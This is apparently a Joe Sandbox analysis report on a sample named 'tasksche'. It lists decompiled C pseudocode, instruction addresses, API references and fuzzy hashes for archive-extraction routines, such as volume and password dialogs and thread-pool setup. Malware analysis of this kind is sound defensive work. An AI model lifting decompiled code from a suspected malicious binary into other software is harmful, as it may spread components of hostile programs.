                                                                                              0x00418d18
                                                                                              0x00418d72
                                                                                              0x00418d76
                                                                                              0x00418d87
                                                                                              0x00418d8d
                                                                                              0x00418d9b
                                                                                              0x00418d9b
                                                                                              0x00418da0
                                                                                              0x00418da6
                                                                                              0x00418da9
                                                                                              0x00418dba
                                                                                              0x00418dc6
                                                                                              0x00418dcf
                                                                                              0x00418dab
                                                                                              0x00418dab
                                                                                              0x00418dab
                                                                                              0x00418dd4
                                                                                              0x00418dd9
                                                                                              0x00418de0
                                                                                              0x00418de7
                                                                                              0x00418df0
                                                                                              0x00418e08
                                                                                              0x00418e08
                                                                                              0x00000000
                                                                                              0x00418ba0
                                                                                              0x00418ba7
                                                                                              0x00418bb8
                                                                                              0x00418bc1
                                                                                              0x00418be0
                                                                                              0x00418bec
                                                                                              0x00418bec
                                                                                              0x00000000
                                                                                              0x00418be0
                                                                                              0x00418bad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00418baf
                                                                                              0x00418bb6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00418bb6
                                                                                              0x00418b98
                                                                                              0x00418b82
                                                                                              0x00418b89
                                                                                              0x00418b8d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00418b8d
                                                                                              0x00418b67
                                                                                              0x00418b6d
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy
                                                                                              • String ID: T
                                                                                              • API String ID: 3048848545-3187964512
                                                                                              • Opcode ID: 7b9b9af83664cc87fe2d3df4d2851bf5f64a8acbd8ca5ef161931a2b21923617
                                                                                              • Instruction ID: 08ee224434b4342d1c159c2c22343cdeaadf414e9d08c0d11a019e9d32988bbe
                                                                                              • Opcode Fuzzy Hash: 7b9b9af83664cc87fe2d3df4d2851bf5f64a8acbd8ca5ef161931a2b21923617
                                                                                              • Instruction Fuzzy Hash: 99910871600744AFDF24DF64C884BEAB7F8AF15304F0445AFE95997282CB78AAC4CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 59%
                                                                                              			E00406D02(void* __edx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* _t46;
                                                                                              				signed int _t56;
                                                                                              				signed int _t59;
                                                                                              				void* _t63;
                                                                                              				signed int _t64;
                                                                                              				signed int _t70;
                                                                                              				void* _t96;
                                                                                              				intOrPtr* _t101;
                                                                                              				void* _t103;
                                                                                              
                                                                                              				_t96 = __edx;
                                                                                              				E0041A4DC(E00429658, _t103);
                                                                                              				E0041AAF0(0x5094);
                                                                                              				_t101 =  *((intOrPtr*)(_t103 + 0xc));
                                                                                              				if( *_t101 == 0 ||  *((intOrPtr*)(_t101 + 2)) != 0) {
                                                                                              					_push(0x802);
                                                                                              					_t46 = _t103 - 0x307c;
                                                                                              				} else {
                                                                                              					E0041A7F7(_t103 - 0x307c, L".\\");
                                                                                              					_push(0x800);
                                                                                              					_t46 = _t103 - 0x3078;
                                                                                              				}
                                                                                              				_push(_t101);
                                                                                              				_push(_t46);
                                                                                              				E00410B9C();
                                                                                              				E004066DA(0, 0x802,  *((intOrPtr*)(_t103 + 8)), _t103 - 0x407c, 0x800);
                                                                                              				if( *((short*)(_t103 - 0x407c)) == 0x3a) {
                                                                                              					__eflags =  *(_t103 + 0x10);
                                                                                              					if(__eflags == 0) {
                                                                                              						E00410BC9(__eflags, _t103 - 0x307c, _t103 - 0x407c, 0x802);
                                                                                              						E004067E1(_t103 - 0x2078);
                                                                                              						_push(0);
                                                                                              						 *(_t103 + 0x13) = E004096BC(_t96, _t101, _t103 - 0x2078);
                                                                                              						_t56 =  *(_t103 - 0x1070);
                                                                                              						__eflags = _t56 & 0x00000001;
                                                                                              						if((_t56 & 0x00000001) != 0) {
                                                                                              							_t72 = _t56 & 0xfffffffe;
                                                                                              							__eflags = _t56 & 0xfffffffe;
                                                                                              							E0040908D(_t101, _t72);
                                                                                              						}
                                                                                              						E00408786(_t103 - 0x1030);
                                                                                              						 *(_t103 - 4) = 0;
                                                                                              						_t59 = E00408A0A(_t103 - 0x1030, __eflags, _t103 - 0x307c, 0x11);
                                                                                              						__eflags = _t59;
                                                                                              						if(_t59 != 0) {
                                                                                              							_push(_t103 - 0x1030);
                                                                                              							_push(0);
                                                                                              							_t70 = E00402C8B( *((intOrPtr*)(_t103 + 8)), _t96);
                                                                                              							__eflags = _t70;
                                                                                              							if(_t70 != 0) {
                                                                                              								E00408A32(_t103 - 0x1030);
                                                                                              							}
                                                                                              						}
                                                                                              						E00408786(_t103 - 0x50a0);
                                                                                              						 *(_t103 - 4) = 1;
                                                                                              						__eflags =  *(_t103 + 0x13);
                                                                                              						if( *(_t103 + 0x13) != 0) {
                                                                                              							_push(5);
                                                                                              							_push(_t101);
                                                                                              							_t64 = E004087C3(_t103 - 0x50a0);
                                                                                              							__eflags = _t64;
                                                                                              							if(_t64 != 0) {
                                                                                              								SetFileTime( *(_t103 - 0x509c), _t103 - 0x1050, _t103 - 0x1048, _t103 - 0x1040);
                                                                                              							}
                                                                                              						}
                                                                                              						E0040908D(_t101,  *(_t103 - 0x1070));
                                                                                              						 *(_t103 - 4) = 0;
                                                                                              						E00408C7D(0, _t103 - 0x50a0);
                                                                                              						_t38 = _t103 - 4;
                                                                                              						 *_t38 =  *(_t103 - 4) | 0xffffffff;
                                                                                              						__eflags =  *_t38;
                                                                                              						_t63 = E00408C7D(0, _t103 - 0x1030);
                                                                                              					} else {
                                                                                              						_push(0);
                                                                                              						_push(0);
                                                                                              						_t63 = E00402C8B( *((intOrPtr*)(_t103 + 8)), _t96);
                                                                                              					}
                                                                                              				} else {
                                                                                              					E0040639F(0x50,  *((intOrPtr*)(_t103 + 8)) + 0x1e, _t101);
                                                                                              					_t63 = E004062BA(0x4335ac, 3);
                                                                                              				}
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
                                                                                              				return _t63;
                                                                                              			}














                                                                                              0x00406d02
                                                                                              0x00406d07
                                                                                              0x00406d11
                                                                                              0x00406d18
                                                                                              0x00406d26
                                                                                              0x00406d4e
                                                                                              0x00406d4f
                                                                                              0x00406d2e
                                                                                              0x00406d3a
                                                                                              0x00406d41
                                                                                              0x00406d46
                                                                                              0x00406d46
                                                                                              0x00406d55
                                                                                              0x00406d56
                                                                                              0x00406d57
                                                                                              0x00406d6b
                                                                                              0x00406d78
                                                                                              0x00406d9a
                                                                                              0x00406d9d
                                                                                              0x00406dbd
                                                                                              0x00406dc8
                                                                                              0x00406dcd
                                                                                              0x00406ddb
                                                                                              0x00406dde
                                                                                              0x00406de4
                                                                                              0x00406de6
                                                                                              0x00406de8
                                                                                              0x00406de8
                                                                                              0x00406ded
                                                                                              0x00406ded
                                                                                              0x00406df8
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e14
                                                                                              0x00406e16
                                                                                              0x00406e21
                                                                                              0x00406e22
                                                                                              0x00406e23
                                                                                              0x00406e28
                                                                                              0x00406e2a
                                                                                              0x00406e32
                                                                                              0x00406e32
                                                                                              0x00406e2a
                                                                                              0x00406e3d
                                                                                              0x00406e42
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e4d
                                                                                              0x00406e54
                                                                                              0x00406e59
                                                                                              0x00406e5b
                                                                                              0x00406e78
                                                                                              0x00406e78
                                                                                              0x00406e5b
                                                                                              0x00406e85
                                                                                              0x00406e90
                                                                                              0x00406e93
                                                                                              0x00406e98
                                                                                              0x00406e98
                                                                                              0x00406e98
                                                                                              0x00406ea2
                                                                                              0x00406d9f
                                                                                              0x00406da2
                                                                                              0x00406da3
                                                                                              0x00406da4
                                                                                              0x00406da4
                                                                                              0x00406d7a
                                                                                              0x00406d84
                                                                                              0x00406d90
                                                                                              0x00406d90
                                                                                              0x00406ead
                                                                                              0x00406eb5

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00406D07
                                                                                              • _wcscpy.LIBCMT ref: 00406D3A
                                                                                                • Part of subcall function 00410BC9: _wcslen.LIBCMT ref: 00410BCF
                                                                                                • Part of subcall function 00410BC9: _wcsncat.LIBCMT ref: 00410BE8
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000), ref: 00406E78
                                                                                                • Part of subcall function 0040908D: SetFileAttributesW.KERNEL32(00000000,00000000,74D0F790,00000001,?,0040933D,00000000,?,?,0040941E,?,00000001,00000000,?,?), ref: 004090A8
                                                                                                • Part of subcall function 0040908D: SetFileAttributesW.KERNEL32(?,00000000,00000000,?,00000800,?,0040933D,00000000,?,?,0040941E,?,00000001,00000000,?,?), ref: 004090D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$H_prologTime_wcscpy_wcslen_wcsncat
                                                                                              • String ID: :
                                                                                              • API String ID: 326910402-336475711
                                                                                              • Opcode ID: 5e0e7d49851dca55c4deade094d134f4ea512213999111766949daa2ff960fa4
                                                                                              • Instruction ID: 6639f4f99703ce1112f5787d69d8c123706ab186ca62756c3ad703d048bc38cc
                                                                                              • Opcode Fuzzy Hash: 5e0e7d49851dca55c4deade094d134f4ea512213999111766949daa2ff960fa4
                                                                                              • Instruction Fuzzy Hash: D0417F71905258AAEB20EB64CC55EEE737CAF04344F0040ABB556B71C2DB78AF94CF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E0040D53E(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
                                                                                              				void* _t12;
                                                                                              				void* _t17;
                                                                                              				void* _t21;
                                                                                              				void* _t24;
                                                                                              				void* _t27;
                                                                                              				void* _t29;
                                                                                              				struct HWND__* _t31;
                                                                                              				WCHAR** _t32;
                                                                                              
                                                                                              				_t32 = _a16;
                                                                                              				_t31 = _a4;
                                                                                              				if(E004060EE(__edx, _t31, _a8, _a12, _t32, L"ASKNEXTVOL", 0, 0) != 0) {
                                                                                              					L14:
                                                                                              					__eflags = 1;
                                                                                              					return 1;
                                                                                              				}
                                                                                              				_t12 = _a8 - 0x110;
                                                                                              				if(_t12 == 0) {
                                                                                              					_push( *_t32);
                                                                                              					 *0x44cf2c = _t32;
                                                                                              					L13:
                                                                                              					SetDlgItemTextW(_t31, 0x65, ??);
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				if(_t12 != 1) {
                                                                                              					L6:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                              				if(_t17 == 0) {
                                                                                              					GetDlgItemTextW(_t31, 0x65,  *( *0x44cf2c), ( *0x44cf2c)[1]);
                                                                                              					_push(1);
                                                                                              					L10:
                                                                                              					EndDialog(_t31, ??);
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				_t21 = _t17 - 1;
                                                                                              				if(_t21 == 0) {
                                                                                              					_push(0);
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				if(_t21 == 0x64) {
                                                                                              					_t24 = E0040A5DB(__eflags,  *( *0x44cf2c));
                                                                                              					_t27 = E00405164(_t29, _t31, E0040C3BF(0x8e),  *( *0x44cf2c), _t24, 0);
                                                                                              					__eflags = _t27;
                                                                                              					if(_t27 == 0) {
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					_push( *( *0x44cf2c));
                                                                                              					goto L13;
                                                                                              				}
                                                                                              				goto L6;
                                                                                              			}











                                                                                              0x0040d542
                                                                                              0x0040d546
                                                                                              0x0040d561
                                                                                              0x0040d5ee
                                                                                              0x0040d5f0
                                                                                              0x00000000
                                                                                              0x0040d5f0
                                                                                              0x0040d56a
                                                                                              0x0040d56f
                                                                                              0x0040d5dd
                                                                                              0x0040d5df
                                                                                              0x0040d5e5
                                                                                              0x0040d5e8
                                                                                              0x00000000
                                                                                              0x0040d5e8
                                                                                              0x0040d572
                                                                                              0x0040d583
                                                                                              0x00000000
                                                                                              0x0040d583
                                                                                              0x0040d578
                                                                                              0x0040d579
                                                                                              0x0040d5d3
                                                                                              0x0040d5d9
                                                                                              0x0040d5bd
                                                                                              0x0040d5be
                                                                                              0x00000000
                                                                                              0x0040d5be
                                                                                              0x0040d57b
                                                                                              0x0040d57c
                                                                                              0x0040d5bb
                                                                                              0x00000000
                                                                                              0x0040d5bb
                                                                                              0x0040d581
                                                                                              0x0040d590
                                                                                              0x0040d5a9
                                                                                              0x0040d5ae
                                                                                              0x0040d5b0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d5b7
                                                                                              0x00000000
                                                                                              0x0040d5b7
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$Dialog
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 1770891597-3402441367
                                                                                              • Opcode ID: a8a6f44b6775d0cd3294368f2a4b23b4347bfb04fbb05bfaf2c83a68a4392c99
                                                                                              • Instruction ID: 7c41b1936654f57e10877f1e9afce92132798bffb5e44c1de30f76ec9c95968c
                                                                                              • Opcode Fuzzy Hash: a8a6f44b6775d0cd3294368f2a4b23b4347bfb04fbb05bfaf2c83a68a4392c99
                                                                                              • Instruction Fuzzy Hash: 23118135600104BBDB219FA49C45F663775EB0A718F044036FE01FA1E0D77AD825AB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E0041254D(intOrPtr __ecx, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v28;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				intOrPtr _t25;
                                                                                              				signed int _t30;
                                                                                              				signed int _t31;
                                                                                              				intOrPtr _t35;
                                                                                              				signed int _t40;
                                                                                              				void* _t41;
                                                                                              				signed int _t42;
                                                                                              				signed int _t46;
                                                                                              				signed int _t47;
                                                                                              				unsigned int _t48;
                                                                                              				void* _t51;
                                                                                              
                                                                                              				_v16 = __ecx;
                                                                                              				_t25 = E0041252C(__ecx);
                                                                                              				_t47 = 0;
                                                                                              				_v8 = 0;
                                                                                              				if(_a4 <= 0) {
                                                                                              					return _t25;
                                                                                              				}
                                                                                              				_push(_t35);
                                                                                              				_push(_t48);
                                                                                              				do {
                                                                                              					if(_v8 >= 0x20) {
                                                                                              						if(_t47 < _a4) {
                                                                                              							L8:
                                                                                              							E0041216A( &_v28);
                                                                                              							E0041C77F( &_v28, 0x42d504);
                                                                                              							goto L9;
                                                                                              						}
                                                                                              						L12:
                                                                                              						return _t25;
                                                                                              					}
                                                                                              					_t48 = _a4 - _t47;
                                                                                              					_t41 = 0x20;
                                                                                              					_t42 = _t41 - _v8;
                                                                                              					_t30 = _t48;
                                                                                              					_t31 = _t30 / _t42;
                                                                                              					_t46 = _t30 % _t42;
                                                                                              					_v12 = _t31;
                                                                                              					if(_t31 <= 0x400000) {
                                                                                              						_v12 = 0x400000;
                                                                                              					}
                                                                                              					while(_t48 >= _v12) {
                                                                                              						_t35 = E0041CF3E(_t35, _t46, _t47, _t48);
                                                                                              						if(_t35 != 0) {
                                                                                              							goto L9;
                                                                                              						}
                                                                                              						_t48 = _t48 - (_t48 >> 5);
                                                                                              					}
                                                                                              					goto L8;
                                                                                              					L9:
                                                                                              					E0041A820(_t47, _t35, 0, _t48);
                                                                                              					_t25 = _v16;
                                                                                              					_t40 = _v8 << 2;
                                                                                              					_t47 = _t47 + _t48;
                                                                                              					_t51 = _t51 + 0xc;
                                                                                              					_v8 = _v8 + 1;
                                                                                              					 *((intOrPtr*)(_t40 + _t25)) = _t35;
                                                                                              					 *((intOrPtr*)(_t40 + _t25 + 0x80)) = _t47;
                                                                                              				} while (_t47 < _a4);
                                                                                              				goto L12;
                                                                                              			}




















                                                                                              0x00412554
                                                                                              0x00412557
                                                                                              0x0041255c
                                                                                              0x0041255e
                                                                                              0x00412564
                                                                                              0x004125f7
                                                                                              0x004125f7
                                                                                              0x0041256a
                                                                                              0x0041256b
                                                                                              0x0041256c
                                                                                              0x00412570
                                                                                              0x004125f1
                                                                                              0x004125ad
                                                                                              0x004125b0
                                                                                              0x004125be
                                                                                              0x00000000
                                                                                              0x004125be
                                                                                              0x004125f3
                                                                                              0x00000000
                                                                                              0x004125f4
                                                                                              0x00412577
                                                                                              0x00412579
                                                                                              0x0041257a
                                                                                              0x0041257f
                                                                                              0x00412581
                                                                                              0x00412581
                                                                                              0x00412588
                                                                                              0x0041258d
                                                                                              0x0041258f
                                                                                              0x0041258f
                                                                                              0x004125a8
                                                                                              0x0041259a
                                                                                              0x0041259f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004125a6
                                                                                              0x004125a6
                                                                                              0x00000000
                                                                                              0x004125c3
                                                                                              0x004125c7
                                                                                              0x004125cf
                                                                                              0x004125d2
                                                                                              0x004125d5
                                                                                              0x004125d7
                                                                                              0x004125da
                                                                                              0x004125dd
                                                                                              0x004125e0
                                                                                              0x004125e7
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3963884845-3916222277
                                                                                              • Opcode ID: 653566bfccebebc550ca30b6af37db387d4266e4fa5bc9fcb69beb97700c845e
                                                                                              • Instruction ID: ba4e6bc0ef6041dd665025fb65f45a384477b48ee7e133f8ed84bbd0a598a512
                                                                                              • Opcode Fuzzy Hash: 653566bfccebebc550ca30b6af37db387d4266e4fa5bc9fcb69beb97700c845e
                                                                                              • Instruction Fuzzy Hash: 60110671E01218BACB14EFA9CAD55DEB776FF54344F10406BE405E7241D6B85BD2CB88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 83%
                                                                                              			E0040D477(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                                                                                              				short _v260;
                                                                                              				void* _t15;
                                                                                              				void* _t20;
                                                                                              				struct HWND__* _t33;
                                                                                              
                                                                                              				_t33 = _a4;
                                                                                              				if(E004060EE(__edx, _t33, _a8, _a12, _a16, L"GETPASSWORD1", 0, 0) != 0) {
                                                                                              					L10:
                                                                                              					return 1;
                                                                                              				}
                                                                                              				_t15 = _a8 - 0x110;
                                                                                              				if(_t15 == 0) {
                                                                                              					SetDlgItemTextW(_t33, 0x66, _a16);
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				if(_t15 != 1) {
                                                                                              					L5:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t20 = (_a12 & 0x0000ffff) - 1;
                                                                                              				if(_t20 == 0) {
                                                                                              					GetDlgItemTextW(_t33, 0x65,  &_v260, 0x80);
                                                                                              					E0040D033(__ebx, 0x44ce20,  &_v260);
                                                                                              					E0040CFA3( &_v260, 0x80);
                                                                                              					_push(1);
                                                                                              					L7:
                                                                                              					EndDialog(_t33, ??);
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				if(_t20 == 1) {
                                                                                              					_push(0);
                                                                                              					goto L7;
                                                                                              				}
                                                                                              				goto L5;
                                                                                              			}







                                                                                              0x0040d482
                                                                                              0x0040d49f
                                                                                              0x0040d50a
                                                                                              0x00000000
                                                                                              0x0040d50c
                                                                                              0x0040d4a4
                                                                                              0x0040d4a9
                                                                                              0x0040d504
                                                                                              0x00000000
                                                                                              0x0040d504
                                                                                              0x0040d4ac
                                                                                              0x0040d4b8
                                                                                              0x00000000
                                                                                              0x0040d4b8
                                                                                              0x0040d4b2
                                                                                              0x0040d4b3
                                                                                              0x0040d4d6
                                                                                              0x0040d4e8
                                                                                              0x0040d4f5
                                                                                              0x0040d4fa
                                                                                              0x0040d4bd
                                                                                              0x0040d4be
                                                                                              0x00000000
                                                                                              0x0040d4be
                                                                                              0x0040d4b6
                                                                                              0x0040d4bc
                                                                                              0x00000000
                                                                                              0x0040d4bc
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$Dialog
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 1770891597-3292211884
                                                                                              • Opcode ID: 2c39065e7e84a8441d2400259efe6a077f35be0b7a0eee454e8495a0c984ab02
                                                                                              • Instruction ID: 3eed9e1ab7e5d8a1da33783b11a95132ac7616313df89bdc2d2bc64375715bf5
                                                                                              • Opcode Fuzzy Hash: 2c39065e7e84a8441d2400259efe6a077f35be0b7a0eee454e8495a0c984ab02
                                                                                              • Instruction Fuzzy Hash: 4F11CE329001187ADB219FA1AC44EFB3A6DEF59754F404036FD05B20D0C67CD96A96AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E00410F29(long* __ecx, long _a4) {
                                                                                              				long _t11;
                                                                                              				void* _t14;
                                                                                              				long _t23;
                                                                                              				long* _t25;
                                                                                              
                                                                                              				_t19 = __ecx;
                                                                                              				_t11 = _a4;
                                                                                              				_t23 = 0x20;
                                                                                              				_t25 = __ecx;
                                                                                              				 *__ecx = _t11;
                                                                                              				if(_t11 > _t23) {
                                                                                              					 *__ecx = _t23;
                                                                                              				}
                                                                                              				if( *_t25 == 0) {
                                                                                              					 *_t25 = 1;
                                                                                              				}
                                                                                              				_t25[0x21] = 0;
                                                                                              				if( *_t25 > _t23) {
                                                                                              					 *_t25 = _t23;
                                                                                              				}
                                                                                              				_t3 =  &(_t25[0x68]); // 0x1a0
                                                                                              				_t25[0x65] = 0;
                                                                                              				InitializeCriticalSection(_t3);
                                                                                              				_t25[0x66] = CreateSemaphoreW(0, 0, _t23, 0);
                                                                                              				_t14 = CreateEventW(0, 1, 1, 0);
                                                                                              				_t25[0x67] = _t14;
                                                                                              				if(_t25[0x66] == 0 || _t14 == 0) {
                                                                                              					_push(L"\nThread pool initialization failed.");
                                                                                              					_push(0x4335ac);
                                                                                              					E00406423(_t19);
                                                                                              					E00406371(0x4335ac, 2);
                                                                                              				}
                                                                                              				_t25[0x63] = 0;
                                                                                              				_t25[0x64] = 0;
                                                                                              				_t25[0x22] = 0;
                                                                                              				return _t25;
                                                                                              			}







                                                                                              0x00410f29
                                                                                              0x00410f29
                                                                                              0x00410f32
                                                                                              0x00410f33
                                                                                              0x00410f35
                                                                                              0x00410f39
                                                                                              0x00410f3b
                                                                                              0x00410f3b
                                                                                              0x00410f41
                                                                                              0x00410f43
                                                                                              0x00410f43
                                                                                              0x00410f49
                                                                                              0x00410f51
                                                                                              0x00410f53
                                                                                              0x00410f53
                                                                                              0x00410f55
                                                                                              0x00410f5c
                                                                                              0x00410f62
                                                                                              0x00410f78
                                                                                              0x00410f7e
                                                                                              0x00410f84
                                                                                              0x00410f90
                                                                                              0x00410f96
                                                                                              0x00410fa0
                                                                                              0x00410fa1
                                                                                              0x00410fac
                                                                                              0x00410fac
                                                                                              0x00410fb2
                                                                                              0x00410fb8
                                                                                              0x00410fbe
                                                                                              0x00410fc8

                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(000001A0,?,000001B8,0044F590,004110EE,00000020,?,00409901,?,?,?,0040BB60,?,?,00000000,?), ref: 00410F62
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00409901,?,?,?,0040BB60,?,?,00000000,?,?,004124ED), ref: 00410F6C
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00409901,?,?,?,0040BB60,?,?,00000000,?,?,004124ED), ref: 00410F7E
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00410F96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
